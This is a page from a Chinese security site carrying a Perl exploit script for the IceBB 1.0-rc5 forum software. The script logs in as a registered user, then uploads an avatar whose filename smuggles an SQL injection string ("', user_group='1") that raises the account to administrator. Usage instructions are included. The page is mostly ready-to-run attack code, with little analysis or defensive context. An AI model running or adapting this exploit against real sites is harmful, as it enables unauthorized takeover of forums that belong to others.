首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IceBB 1.0-rc5 Remote Create Admin Exploit
来源:www.Hessamx.Net 作者:Hessam-x 发布时间:2007-03-27  
#!/usr/bin/perl
#  IceBB 1.0-rc5 Remote Create Admin Exploit
#  1. register a user
#  2. run this exploit with this usage : $perl xpl.pl [host&path] [uname] [pass]
#  3. login with admin access :)
# - magic_quotes_gpc = Off
#
#### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net

use LWP::UserAgent;
use HTTP::Cookies;

$port = "80";
$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;

print q(
###########################################################
#        IceBB 1.0-rc5 Remote Create Admin Exploit        #
#                    www.Hessamx.Net                      #
################# (C)oded By Hessam-x #####################

);


if (@ARGV < 3) {
print " #  usage : xpl.pl [host&path] [uname] [pass]\n";
print " #  e.g : xpl.pl www.milw0rm.com/icebb/ str0ke 123456\n";
exit();
}

   print " [~] User/Password : $uname/$passwd \n";
   print " [~] Host : $host \n";

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );


$login = $xpl->post($url.'index.php',
Content => [
'act' => 'login',
'from' => 'index.php',
'user' => $uname,
'pass' => $passwd,
'func' => 'Login',
],);

if($cookie_jar->as_string =~ /icebb_sessid=(.*?);/) {
       $cookie = $1;
   print " [~] Logined ...\n";
} else {
print " [-] Can not Login In $host !\n";
exit();
}

$badcode = "', user_group='1";
$avat = $xpl->post($url.'index.php',Content_Type => 'form-data',
Content => [
'avtype'  => 'upload',
'act' => 'ucp',
'func' => 'avatar',
'file'   => [
              undef,
              'avatar.jpg'.$badcode,
              Content_type => 'text/plain',
              Content => 'MYAVATAR',
             ],
'submit'        => 'Save',
],
);
$test = $xpl->get($url.'index.php');
if($test->as_string =~ /Admin Control Center/) {
print " [+] You Are admin Now ! \n";
} else {
print " [-] Exploit Failed ! \n";
}
print "\n #################################################### \n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy File Sharing FTP Server 2
·IceBB 1.0-rc5 Remote Code Exec
·FreeBSD mcweject 0.9 (eject) L
·PHP-Nuke Module Addressbook 1.
·MS Internet Explorer Recordset
·PHP 5.2.1 with PECL phpDOC Loc
·Frontbase <= 4.2.7 Remote Buff
·sBLOG 0.7.3 Beta (inc/lang.php
·PBlang 4.66z Remote Code Execu
·IBM Lotus Domino Server 6.5 (u
·PHP < 4.4.5 / 5.2.1 _SESSION D
·Xoops Module MyAds Bug Fix <=
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved